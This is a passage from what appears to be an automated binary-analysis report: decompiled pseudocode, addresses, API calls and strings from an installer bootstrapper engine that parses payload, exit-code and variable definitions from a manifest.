                                                                                                                                                                  				_t161 = _v12;
                                                                                                                                                                  				if(_t161 != 0) {
                                                                                                                                                                  					 *((intOrPtr*)( *_t161 + 8))(_t161);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					E004380AB(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t176;
                                                                                                                                                                  			}



















                                                                                                                                                                  0x004080ac
                                                                                                                                                                  0x004080bd
                                                                                                                                                                  0x004080c1
                                                                                                                                                                  0x004083fb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004080c7
                                                                                                                                                                  0x004080e2
                                                                                                                                                                  0x004080fd
                                                                                                                                                                  0x00408102
                                                                                                                                                                  0x0040811e
                                                                                                                                                                  0x004083e0
                                                                                                                                                                  0x004083e3
                                                                                                                                                                  0x004083e8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408124
                                                                                                                                                                  0x00408124
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408124
                                                                                                                                                                  0x00408104
                                                                                                                                                                  0x00408104
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408104
                                                                                                                                                                  0x004080e4
                                                                                                                                                                  0x004080e4
                                                                                                                                                                  0x0040812b
                                                                                                                                                                  0x0040812f
                                                                                                                                                                  0x00408173
                                                                                                                                                                  0x00408184
                                                                                                                                                                  0x0040818c
                                                                                                                                                                  0x004081a7
                                                                                                                                                                  0x004081af
                                                                                                                                                                  0x004081b9
                                                                                                                                                                  0x004083d9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004081bf
                                                                                                                                                                  0x004081bf
                                                                                                                                                                  0x004081d0
                                                                                                                                                                  0x004081d8
                                                                                                                                                                  0x004081e2
                                                                                                                                                                  0x004083d2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004081e8
                                                                                                                                                                  0x004081e8
                                                                                                                                                                  0x004081f9
                                                                                                                                                                  0x00408201
                                                                                                                                                                  0x00408223
                                                                                                                                                                  0x00408234
                                                                                                                                                                  0x0040823c
                                                                                                                                                                  0x00408260
                                                                                                                                                                  0x00408271
                                                                                                                                                                  0x00408279
                                                                                                                                                                  0x0040829d
                                                                                                                                                                  0x004082ae
                                                                                                                                                                  0x004082b2
                                                                                                                                                                  0x004083cb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004082b8
                                                                                                                                                                  0x004082c8
                                                                                                                                                                  0x004082cc
                                                                                                                                                                  0x004083c4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004082d2
                                                                                                                                                                  0x004082e3
                                                                                                                                                                  0x004082eb
                                                                                                                                                                  0x0040830e
                                                                                                                                                                  0x0040830e
                                                                                                                                                                  0x00408313
                                                                                                                                                                  0x00408318
                                                                                                                                                                  0x0040831b
                                                                                                                                                                  0x0040831b
                                                                                                                                                                  0x00408325
                                                                                                                                                                  0x00408326
                                                                                                                                                                  0x00408329
                                                                                                                                                                  0x0040832c
                                                                                                                                                                  0x00408332
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004082ed
                                                                                                                                                                  0x004082ef
                                                                                                                                                                  0x004083bd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004082f5
                                                                                                                                                                  0x00408304
                                                                                                                                                                  0x00408308
                                                                                                                                                                  0x004083b6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408308
                                                                                                                                                                  0x004082ef
                                                                                                                                                                  0x004082eb
                                                                                                                                                                  0x004082cc
                                                                                                                                                                  0x0040827b
                                                                                                                                                                  0x0040827d
                                                                                                                                                                  0x004083af
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408283
                                                                                                                                                                  0x00408293
                                                                                                                                                                  0x00408297
                                                                                                                                                                  0x004083a8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408297
                                                                                                                                                                  0x0040827d
                                                                                                                                                                  0x0040823e
                                                                                                                                                                  0x00408240
                                                                                                                                                                  0x004083a1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408246
                                                                                                                                                                  0x00408256
                                                                                                                                                                  0x0040825a
                                                                                                                                                                  0x0040839a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040825a
                                                                                                                                                                  0x00408240
                                                                                                                                                                  0x00408203
                                                                                                                                                                  0x00408205
                                                                                                                                                                  0x00408393
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040820b
                                                                                                                                                                  0x00408219
                                                                                                                                                                  0x0040821d
                                                                                                                                                                  0x00408389
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040821d
                                                                                                                                                                  0x00408205
                                                                                                                                                                  0x00408201
                                                                                                                                                                  0x004081d8
                                                                                                                                                                  0x0040837f
                                                                                                                                                                  0x0040837f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040837f
                                                                                                                                                                  0x00408131
                                                                                                                                                                  0x00408142
                                                                                                                                                                  0x0040814a
                                                                                                                                                                  0x00408154
                                                                                                                                                                  0x00408375
                                                                                                                                                                  0x00408415
                                                                                                                                                                  0x00408415
                                                                                                                                                                  0x00408416
                                                                                                                                                                  0x0040815a
                                                                                                                                                                  0x00408169
                                                                                                                                                                  0x0040816d
                                                                                                                                                                  0x0040836b

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431078: GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                    • Part of subcall function 00431078: HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,?,00000000,0043C524,?,00000000), ref: 004080DD
                                                                                                                                                                  Strings
                                                                                                                                                                  • embedded, xrefs: 004080EF
                                                                                                                                                                  • Failed to get @Packaging., xrefs: 004083FB
                                                                                                                                                                  • Hash, xrefs: 004082A1
                                                                                                                                                                  • Catalog, xrefs: 004082D6
                                                                                                                                                                  • Failed to select payload nodes., xrefs: 00407FD5
                                                                                                                                                                  • Failed to to find container: %ls, xrefs: 0040836E
                                                                                                                                                                  • Failed to get payload node count., xrefs: 00407FEF
                                                                                                                                                                  • Failed to allocate memory for payload structs., xrefs: 00408033
                                                                                                                                                                  • Failed to get @SourcePath., xrefs: 004083D9
                                                                                                                                                                  • Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 0040839A
                                                                                                                                                                  • Container, xrefs: 00408135
                                                                                                                                                                  • CertificateRootThumbprint, xrefs: 00408264
                                                                                                                                                                  • Failed to hex decode @CertificateRootThumbprint., xrefs: 004083A8
                                                                                                                                                                  • Failed to parse @FileSize., xrefs: 00408389
                                                                                                                                                                  • Failed to get @LayoutOnly., xrefs: 0040837F
                                                                                                                                                                  • Failed to get @Container., xrefs: 00408375
                                                                                                                                                                  • Failed to get @FileSize., xrefs: 00408393
                                                                                                                                                                  • DownloadUrl, xrefs: 004081C3
                                                                                                                                                                  • Failed to find catalog., xrefs: 004083B6
                                                                                                                                                                  • Failed to get @FilePath., xrefs: 00408402
                                                                                                                                                                  • Packaging, xrefs: 004080B0
                                                                                                                                                                  • Failed to get @Id., xrefs: 00408409
                                                                                                                                                                  • Invalid value for @Packaging: %ls, xrefs: 004083E8
                                                                                                                                                                  • Failed to get next node., xrefs: 00408410
                                                                                                                                                                  • Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 004083A1
                                                                                                                                                                  • Failed to get @DownloadUrl., xrefs: 004083D2
                                                                                                                                                                  • Payload, xrefs: 00407FC2
                                                                                                                                                                  • external, xrefs: 0040810B
                                                                                                                                                                  • Failed to get @Catalog., xrefs: 004083BD
                                                                                                                                                                  • Failed to get @CertificateRootThumbprint., xrefs: 004083AF
                                                                                                                                                                  • Failed to get @Hash., xrefs: 004083CB
                                                                                                                                                                  • FileSize, xrefs: 004081EC
                                                                                                                                                                  • LayoutOnly, xrefs: 00408177
                                                                                                                                                                  • SourcePath, xrefs: 0040819A
                                                                                                                                                                  • CertificateRootPublicKeyIdentifier, xrefs: 00408227
                                                                                                                                                                  • download, xrefs: 004080CF
                                                                                                                                                                  • Failed to hex decode the Payload/@Hash., xrefs: 004083C4
                                                                                                                                                                  • payload.cpp, xrefs: 00408029
                                                                                                                                                                  • FilePath, xrefs: 00408095
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocCompareProcessString
                                                                                                                                                                  • API String ID: 4260887210-3127305756
                                                                                                                                                                  • Opcode ID: ff240ce44b3c38aa1edce21a87984fb0e6764b5b7b5b5d2a75bd38f80e244f23
                                                                                                                                                                  • Instruction ID: 80920ea3dfdec78f9e58eb6797268f5c58797b597333a3559aa9886f20cfe25f
                                                                                                                                                                  • Opcode Fuzzy Hash: ff240ce44b3c38aa1edce21a87984fb0e6764b5b7b5b5d2a75bd38f80e244f23
                                                                                                                                                                  • Instruction Fuzzy Hash: 51C10531901626BBCB119A51CE01FAEB664AF48B24F21517FFD51B72C0DB3DAD019B9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                  			E00419C14(intOrPtr _a4, signed int _a8) {
                                                                                                                                                                  				short* _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				short* _v16;
                                                                                                                                                                  				void* _v20;
                                                                                                                                                                  				intOrPtr* _t77;
                                                                                                                                                                  				intOrPtr _t87;
                                                                                                                                                                  				short* _t88;
                                                                                                                                                                  				int _t95;
                                                                                                                                                                  				void* _t102;
                                                                                                                                                                  				signed int _t106;
                                                                                                                                                                  				int _t111;
                                                                                                                                                                  				signed int* _t115;
                                                                                                                                                                  				void* _t116;
                                                                                                                                                                  				intOrPtr* _t118;
                                                                                                                                                                  				signed int _t119;
                                                                                                                                                                  				intOrPtr _t120;
                                                                                                                                                                  				signed int _t123;
                                                                                                                                                                  				intOrPtr* _t125;
                                                                                                                                                                  				signed int _t127;
                                                                                                                                                                  				signed int _t129;
                                                                                                                                                                  				void* _t134;
                                                                                                                                                                  				void* _t135;
                                                                                                                                                                  				void* _t138;
                                                                                                                                                                  
                                                                                                                                                                  				_t113 = _a4;
                                                                                                                                                                  				_t129 = _a8;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				if(E00435B5E(_a4, L"DetectCondition", _t129 + 0x90) >= 0) {
                                                                                                                                                                  					if(E00435B5E(_t113, L"InstallArguments", _t129 + 0x94) >= 0) {
                                                                                                                                                                  						if(E00435B5E(_t113, L"UninstallArguments", _t129 + 0x9c) >= 0) {
                                                                                                                                                                  							if(E00435B5E(_t113, L"RepairArguments", _t129 + 0x98) >= 0) {
                                                                                                                                                                  								_t134 = E00435D6C(_t116, _t113, L"Repairable", _t129 + 0xa8);
                                                                                                                                                                  								if(_t134 == 0x80070490 || _t134 >= 0) {
                                                                                                                                                                  									_t135 = E00435B5E(_t113, L"Protocol",  &_v8);
                                                                                                                                                                  									if(_t135 < 0) {
                                                                                                                                                                  										if(_t135 == 0x80070490) {
                                                                                                                                                                  											goto L14;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_push("Failed to get @Protocol.");
                                                                                                                                                                  											goto L57;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"burn", 0xffffffff) != 2) {
                                                                                                                                                                  											_t111 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"netfx4", 0xffffffff);
                                                                                                                                                                  											_t127 = 2;
                                                                                                                                                                  											if(_t111 != _t127) {
                                                                                                                                                                  												if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"none", 0xffffffff) != 2) {
                                                                                                                                                                  													goto L58;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													 *(_t129 + 0xac) =  *(_t129 + 0xac) & 0x00000000;
                                                                                                                                                                  													goto L14;
                                                                                                                                                                  												}
                                                                                                                                                                  											} else {
                                                                                                                                                                  												 *(_t129 + 0xac) = _t127;
                                                                                                                                                                  												goto L14;
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											 *(_t129 + 0xac) = 1;
                                                                                                                                                                  											L14:
                                                                                                                                                                  											if(E00435FBE(_t113, L"ExitCode",  &_v20) >= 0) {
                                                                                                                                                                  												_t77 = _v20;
                                                                                                                                                                  												_t128 =  &_v16;
                                                                                                                                                                  												_push( &_v16);
                                                                                                                                                                  												_push(_t77);
                                                                                                                                                                  												if( *((intOrPtr*)( *_t77 + 0x20))() >= 0) {
                                                                                                                                                                  													_t79 = _v16;
                                                                                                                                                                  													if(_v16 == 0) {
                                                                                                                                                                  														L46:
                                                                                                                                                                  														_t138 = 0;
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t87 = E00431078(_t79 * 0xc, 1);
                                                                                                                                                                  														 *((intOrPtr*)(_t129 + 0xb0)) = _t87;
                                                                                                                                                                  														if(_t87 != 0) {
                                                                                                                                                                  															_t88 = _v16;
                                                                                                                                                                  															_a8 = _a8 & 0x00000000;
                                                                                                                                                                  															 *((intOrPtr*)(_t129 + 0xb4)) = _t88;
                                                                                                                                                                  															if(_t88 == 0) {
                                                                                                                                                                  																goto L46;
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_t120 = 0;
                                                                                                                                                                  																_a4 = 0;
                                                                                                                                                                  																while(1) {
                                                                                                                                                                  																	_t115 =  *((intOrPtr*)(_t129 + 0xb0)) + _t120;
                                                                                                                                                                  																	_t138 = E00435F1D(_t120, _v20,  &_v12, 0);
                                                                                                                                                                  																	if(_t138 < 0) {
                                                                                                                                                                  																		break;
                                                                                                                                                                  																	}
                                                                                                                                                                  																	_t138 = E00435B5E(_v12, L"Type",  &_v8);
                                                                                                                                                                  																	if(_t138 < 0) {
                                                                                                                                                                  																		_push("Failed to get @Type.");
                                                                                                                                                                  																		goto L57;
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"success", 0xffffffff) != 2) {
                                                                                                                                                                  																			_t95 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"error", 0xffffffff);
                                                                                                                                                                  																			_t123 = 2;
                                                                                                                                                                  																			if(_t95 != _t123) {
                                                                                                                                                                  																				if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"scheduleReboot", 0xffffffff) != 2) {
                                                                                                                                                                  																					if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"forceReboot", 0xffffffff) != 2) {
                                                                                                                                                                  																						L58:
                                                                                                                                                                  																						_push(_v8);
                                                                                                                                                                  																						_push("Invalid exit code type: %ls");
                                                                                                                                                                  																						_t138 = 0x8000ffff;
                                                                                                                                                                  																						_push(0x8000ffff);
                                                                                                                                                                  																						goto L55;
                                                                                                                                                                  																					} else {
                                                                                                                                                                  																						 *_t115 = 4;
                                                                                                                                                                  																						goto L39;
                                                                                                                                                                  																					}
                                                                                                                                                                  																				} else {
                                                                                                                                                                  																					 *_t115 = 3;
                                                                                                                                                                  																					goto L39;
                                                                                                                                                                  																				}
                                                                                                                                                                  																			} else {
                                                                                                                                                                  																				 *_t115 = _t123;
                                                                                                                                                                  																				goto L39;
                                                                                                                                                                  																			}
                                                                                                                                                                  																		} else {
                                                                                                                                                                  																			 *_t115 = 1;
                                                                                                                                                                  																			L39:
                                                                                                                                                                  																			_t138 = E00435B5E(_v12, L"Code",  &_v8);
                                                                                                                                                                  																			if(_t138 < 0) {
                                                                                                                                                                  																				_push("Failed to get @Code.");
                                                                                                                                                                  																				goto L57;
                                                                                                                                                                  																			} else {
                                                                                                                                                                  																				_t124 = _v8;
                                                                                                                                                                  																				_t102 = 0x2a;
                                                                                                                                                                  																				if(_t102 !=  *_v8) {
                                                                                                                                                                  																					_t138 = E004346E9(_t124, _t128, _t124, 0,  &(_t115[1]));
                                                                                                                                                                  																					if(_t138 < 0) {
                                                                                                                                                                  																						_push(_v8);
                                                                                                                                                                  																						_push("Failed to parse @Code value: %ls");
                                                                                                                                                                  																						_push(_t138);
                                                                                                                                                                  																						L55:
                                                                                                                                                                  																						E00430A57();
                                                                                                                                                                  																					} else {
                                                                                                                                                                  																						goto L43;
                                                                                                                                                                  																					}
                                                                                                                                                                  																				} else {
                                                                                                                                                                  																					_t115[2] = 1;
                                                                                                                                                                  																					L43:
                                                                                                                                                                  																					_t125 = _v12;
                                                                                                                                                                  																					if(_t125 != 0) {
                                                                                                                                                                  																						 *((intOrPtr*)( *_t125 + 8))(_t125);
                                                                                                                                                                  																						_v12 = _v12 & 0x00000000;
                                                                                                                                                                  																					}
                                                                                                                                                                  																					_t106 = _a8 + 1;
                                                                                                                                                                  																					_t120 = _a4 + 0xc;
                                                                                                                                                                  																					_a8 = _t106;
                                                                                                                                                                  																					_a4 = _t120;
                                                                                                                                                                  																					if(_t106 < _v16) {
                                                                                                                                                                  																						continue;
                                                                                                                                                                  																					} else {
                                                                                                                                                                  																						goto L46;
                                                                                                                                                                  																					}
                                                                                                                                                                  																				}
                                                                                                                                                                  																			}
                                                                                                                                                                  																		}
                                                                                                                                                                  																	}
                                                                                                                                                                  																	goto L47;
                                                                                                                                                                  																}
                                                                                                                                                                  																_push("Failed to get next node.");
                                                                                                                                                                  																goto L57;
                                                                                                                                                                  															}
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t138 = 0x8007000e;
                                                                                                                                                                  															E004300D9(_t87, "exeengine.cpp", 0x65, 0x8007000e);
                                                                                                                                                                  															_push("Failed to allocate memory for exit code structs.");
                                                                                                                                                                  															goto L57;
                                                                                                                                                                  														}
                                                                                                                                                                  													}
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_push("Failed to get exit code node count.");
                                                                                                                                                                  													goto L57;
                                                                                                                                                                  												}
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_push("Failed to select exit code nodes.");
                                                                                                                                                                  												goto L57;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push("Failed to get @Repairable.");
                                                                                                                                                                  									goto L57;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to get @RepairArguments.");
                                                                                                                                                                  								goto L57;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push("Failed to get @UninstallArguments.");
                                                                                                                                                                  							goto L57;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to get @InstallArguments.");
                                                                                                                                                                  						goto L57;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to get @DetectCondition.");
                                                                                                                                                                  					L57:
                                                                                                                                                                  					_push(_t138);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				L47:
                                                                                                                                                                  				_t118 = _v20;
                                                                                                                                                                  				if(_t118 != 0) {
                                                                                                                                                                  					 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t119 = _v12;
                                                                                                                                                                  				if(_t119 != 0) {
                                                                                                                                                                  					 *((intOrPtr*)( *_t119 + 8))(_t119);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					E004380AB(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t138;
                                                                                                                                                                  			}

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                  • String ID: Code$DetectCondition$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @Type.$Failed to get @UninstallArguments.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$InstallArguments$Invalid exit code type: %ls$Protocol$RepairArguments$Repairable$Type$UninstallArguments$burn$error$exeengine.cpp$forceReboot$netfx4$none$scheduleReboot$success
                                                                                                                                                                  • API String ID: 760788290-3753375000
                                                                                                                                                                  • Opcode ID: 0e76f42cf1631ccb3669afdb154160f96685f0175130075bc127c46c671747fc
                                                                                                                                                                  • Instruction ID: 636ebf3a7e94396e5188b83d6d97f587019edf25734fbfe327947828235322fa
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e76f42cf1631ccb3669afdb154160f96685f0175130075bc127c46c671747fc
                                                                                                                                                                  • Instruction Fuzzy Hash: 69A1F831A44725BBDB149B64CC51FEEB6A4AB04720F20425BF525FB2D0DBBCAD81878D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E00404769(struct _CRITICAL_SECTION* _a4, intOrPtr _a8) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				short* _v16;
                                                                                                                                                                  				char _v20;
                                                                                                                                                                  				void* _v24;
                                                                                                                                                                  				signed int _v28;
                                                                                                                                                                  				char _v32;
                                                                                                                                                                  				char _v36;
                                                                                                                                                                  				char _v52;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				intOrPtr* _t88;
                                                                                                                                                                  				int _t132;
                                                                                                                                                                  				struct _CRITICAL_SECTION* _t138;
                                                                                                                                                                  				intOrPtr* _t141;
                                                                                                                                                                  				signed int _t142;
                                                                                                                                                                  				int _t151;
                                                                                                                                                                  				signed int _t152;
                                                                                                                                                                  				void* _t153;
                                                                                                                                                                  				signed int _t154;
                                                                                                                                                                  				struct _CRITICAL_SECTION* _t156;
                                                                                                                                                                  				void* _t158;
                                                                                                                                                                  				int _t159;
                                                                                                                                                                  				void* _t161;
                                                                                                                                                                  
                                                                                                                                                                  				_t138 = _a4;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v36 = 0;
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				EnterCriticalSection(_t138);
                                                                                                                                                                  				if(E00435FBE(_a8, L"Variable",  &_v24) >= 0) {
                                                                                                                                                                  					_t88 = _v24;
                                                                                                                                                                  					_t140 =  *_t88;
                                                                                                                                                                  					_t158 =  *((intOrPtr*)( *_t88 + 0x20))(_t88,  &_v32);
                                                                                                                                                                  					if(_t158 >= 0) {
                                                                                                                                                                  						_t151 = 0;
                                                                                                                                                                  						_a4 = 0;
                                                                                                                                                                  						if(_v32 > 0) {
                                                                                                                                                                  							while(1) {
                                                                                                                                                                  								_t158 = E00435F1D(_t140, _v24,  &_v12, _t151);
                                                                                                                                                                  								if(_t158 < 0) {
                                                                                                                                                                  									break;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t158 = E00435B5E(_v12, L"Id",  &_v8);
                                                                                                                                                                  								if(_t158 < 0) {
                                                                                                                                                                  									_push("Failed to get @Id.");
                                                                                                                                                                  									goto L53;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t158 = E00435D6C(_t140, _v12, L"Hidden",  &_v20);
                                                                                                                                                                  									if(_t158 < 0) {
                                                                                                                                                                  										_push("Failed to get @Hidden.");
                                                                                                                                                                  										goto L53;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t158 = E00435D6C(_t140, _v12, L"Persisted",  &_v36);
                                                                                                                                                                  										if(_t158 < 0) {
                                                                                                                                                                  											_push("Failed to get @Persisted.");
                                                                                                                                                                  											goto L53;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t158 = E00435B5E(_v12, L"Value",  &_v16);
                                                                                                                                                                  											if(_t158 == 0x80070490) {
                                                                                                                                                                  												_t159 = _t151;
                                                                                                                                                                  												goto L25;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												if(_t158 < 0) {
                                                                                                                                                                  													_push("Failed to get @Value.");
                                                                                                                                                                  													goto L53;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_t158 = E00418DBD(_t151,  &_v52, _v16, _t151);
                                                                                                                                                                  													if(_t158 < 0) {
                                                                                                                                                                  														_push("Failed to set variant value.");
                                                                                                                                                                  														goto L53;
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t158 = E00435B5E(_v12, L"Type",  &_v16);
                                                                                                                                                                  														if(_t158 < 0) {
                                                                                                                                                                  															_push("Failed to get @Type.");
                                                                                                                                                                  															goto L53;
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t132 = CompareStringW(0x7f, _t151, _v16, 0xffffffff, L"numeric", 0xffffffff);
                                                                                                                                                                  															_t159 = 2;
                                                                                                                                                                  															if(_t132 != _t159) {
                                                                                                                                                                  																if(CompareStringW(0x7f, _t151, _v16, 0xffffffff, L"string", 0xffffffff) != _t159) {
                                                                                                                                                                  																	if(CompareStringW(0x7f, _t151, _v16, 0xffffffff, L"version", 0xffffffff) != _t159) {
                                                                                                                                                                  																		_push(_v16);
                                                                                                                                                                  																		_t153 = 0x80070057;
                                                                                                                                                                  																		_t158 = 0x80070057;
                                                                                                                                                                  																		_push("Invalid value for @Type: %ls");
                                                                                                                                                                  																		goto L45;
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		if(_v20 == 0) {
                                                                                                                                                                  																			_push(_v52);
                                                                                                                                                                  																			E00430F28(_t159, "Initializing version variable \'%ls\' to value \'%ls\'", _v8);
                                                                                                                                                                  																			_t161 = _t161 + 0x10;
                                                                                                                                                                  																		}
                                                                                                                                                                  																		_t159 = 3;
                                                                                                                                                                  																		goto L25;
                                                                                                                                                                  																	}
                                                                                                                                                                  																} else {
                                                                                                                                                                  																	if(_v20 != 0) {
                                                                                                                                                                  																		goto L26;
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		_push(_v52);
                                                                                                                                                                  																		E00430F28(_t159, "Initializing string variable \'%ls\' to value \'%ls\'", _v8);
                                                                                                                                                                  																		_t161 = _t161 + 0x10;
                                                                                                                                                                  																		goto L25;
                                                                                                                                                                  																	}
                                                                                                                                                                  																	goto L27;
                                                                                                                                                                  																}
                                                                                                                                                                  															} else {
                                                                                                                                                                  																if(_v20 == 0) {
                                                                                                                                                                  																	_push(_v52);
                                                                                                                                                                  																	E00430F28(_t159, "Initializing numeric variable \'%ls\' to value \'%ls\'", _v8);
                                                                                                                                                                  																	_t161 = _t161 + 0x10;
                                                                                                                                                                  																}
                                                                                                                                                                  																_t159 = 1;
                                                                                                                                                                  																L25:
                                                                                                                                                                  																if(_v20 != 0) {
                                                                                                                                                                  																	L26:
                                                                                                                                                                  																	E00430F28(2, "Initializing hidden variable \'%ls\'", _v8);
                                                                                                                                                                  																	_t161 = _t161 + 0xc;
                                                                                                                                                                  																}
                                                                                                                                                                  																L27:
                                                                                                                                                                  																_t158 = E00418B53( &_v52, _t159);
